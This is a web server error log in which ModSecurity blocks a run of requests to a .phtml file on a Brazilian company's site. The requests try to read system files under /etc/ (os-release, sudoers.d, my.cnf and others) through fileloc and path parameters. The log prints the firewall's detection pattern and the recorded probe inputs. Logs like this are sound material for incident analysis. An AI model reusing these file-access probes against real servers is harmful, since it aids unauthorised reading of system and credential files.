[Thu Mar 19 16:06:22.969394 2026] [:error] [pid 21563:tid 140411557287680] [client 57.141.18.55:60276] [client 57.141.18.55] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/os-release"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJLkpm7ZmxKZTM4bZpZwAAA5Y"]
[Thu Mar 19 16:06:23.327870 2026] [:error] [pid 26799:tid 140411540502272] [client 57.141.18.105:60280] [client 57.141.18.105] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/subuid-"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJL9a6ubjKNq_cu4Z60gAAA1g"]
[Thu Mar 19 16:06:24.780991 2026] [:error] [pid 21563:tid 140411574073088] [client 57.141.18.3:60310] [client 57.141.18.3] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/odbcinst.ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJMEpm7ZmxKZTM4bZpagAAA5Q"]
[Thu Mar 19 16:06:25.731179 2026] [:error] [pid 5816:tid 140411658000128] [client 57.141.18.123:60340] [client 57.141.18.123] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJMZfmNfuxceSuAEK6RwAAAco"]
[Thu Mar 19 16:06:28.132680 2026] [:error] [pid 7545:tid 140411540502272] [client 57.141.18.102:60362] [client 57.141.18.102] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJMn8B84UptSoTJtY0bwAAAZg"]
[Thu Mar 19 16:06:28.132680 2026] [:error] [pid 15826:tid 140411674785536] [client 57.141.18.12:60394] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJM-oXxyEfFpUF8f8xYQAAAUg"]
[Thu Mar 19 16:06:28.135263 2026] [:error] [pid 15826:tid 140411616036608] [client 57.141.18.37:60400] [client 57.141.18.37] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJM-oXxyEfFpUF8f8xYgAAAU8"]
[Thu Mar 19 16:06:29.251828 2026] [:error] [pid 19655:tid 140411632822016] [client 57.141.18.1:60434] [client 57.141.18.1] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJNU1ujooLWdUDGy75zQAAAE0"]
[Thu Mar 19 16:06:29.676186 2026] [:error] [pid 15826:tid 140411590858496] [client 57.141.18.6:60444] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJNeoXxyEfFpUF8f8xZQAAAVI"]
[Thu Mar 19 16:06:30.380498 2026] [:error] [pid 30077:tid 140411632822016] [client 57.141.18.8:60468] [client 57.141.18.8] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/vconsole.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJNvu8EFLIOrSqIpvN_gAAAk0"]
[Thu Mar 19 16:06:31.279356 2026] [:error] [pid 7235:tid 140411716749056] [client 57.141.18.68:60488] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJN_qxLDW4GITHUkSNtAAAAQM"]
[Thu Mar 19 16:06:31.659811 2026] [:error] [pid 21219:tid 140411658000128] [client 57.141.18.64:60496] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJN_XLqtnMIWvjpaJDaQAAAoo"]
[Thu Mar 19 16:06:32.009975 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.31:60500] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJOP-YZRR_7pZ7nDKvzQAAA8k"]
[Thu Mar 19 16:06:32.353904 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.115:60516] [client 57.141.18.115] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJOP-YZRR_7pZ7nDKvzgAAA8k"]
[Thu Mar 19 16:06:32.581680 2026] [:error] [pid 27293:tid 140411666392832] [client 57.141.18.6:60520] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJOP-YZRR_7pZ7nDKvzwAAA8k"]
[Thu Mar 19 16:06:33.250854 2026] [:error] [pid 21219:tid 140411574073088] [client 57.141.18.113:60532] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJOfXLqtnMIWvjpaJDagAAApQ"]
[Thu Mar 19 16:06:33.268674 2026] [:error] [pid 15826:tid 140411599251200] [client 57.141.18.95:60534] [client 57.141.18.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJOeoXxyEfFpUF8f8xZwAAAVE"]
[Thu Mar 19 16:06:34.009951 2026] [:error] [pid 21563:tid 140411716749056] [client 57.141.18.88:60542] [client 57.141.18.88] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/cron.deny"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJOkpm7ZmxKZTM4bZpbQAAA4M"]
[Thu Mar 19 16:06:34.423566 2026] [:error] [pid 30077:tid 140411632822016] [client 57.141.18.70:60554] [client 57.141.18.70] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc6.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJOvu8EFLIOrSqIpvN_wAAAk0"]
[Thu Mar 19 16:06:34.553002 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.31:60556] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJOhCii7xarUs8iHYPFAAAAgI"]
[Thu Mar 19 16:06:36.190366 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.91:60584] [client 57.141.18.91] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/centos-release-upstream"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJPBCii7xarUs8iHYPFgAAAgI"]
[Thu Mar 19 16:06:36.468239 2026] [:error] [pid 7893:tid 140411582465792] [client 57.141.18.26:60586] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJPBCii7xarUs8iHYPFwAAAhM"]
[Thu Mar 19 16:06:36.639692 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.6:60588] [client 57.141.18.6] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJPBCii7xarUs8iHYPGAAAAgQ"]
[Thu Mar 19 16:06:36.770722 2026] [:error] [pid 7893:tid 140411725141760] [client 57.141.18.60:60590] [client 57.141.18.60] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJPBCii7xarUs8iHYPGQAAAgI"]
[Thu Mar 19 16:06:37.322713 2026] [:error] [pid 7235:tid 140411699963648] [client 57.141.18.12:60598] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJPfqxLDW4GITHUkSNtQAAAQU"]
[Thu Mar 19 16:06:39.117877 2026] [:error] [pid 7893:tid 140411708356352] [client 57.141.18.42:60634] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJPxCii7xarUs8iHYPHgAAAgQ"]
[Thu Mar 19 16:06:40.172810 2026] [:error] [pid 20435:tid 140411624429312] [client 57.141.18.25:60654] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJQJJaM1-0uhhUQJM9UQAAAI4"]
[Thu Mar 19 16:06:40.485640 2026] [:error] [pid 7545:tid 140411708356352] [client 57.141.18.42:60658] [client 57.141.18.42] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/netconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/condolatory/persuadedness012971570240.phtml"] [unique_id "abxJQH8B84UptSoTJtY0cgAAAYQ"]
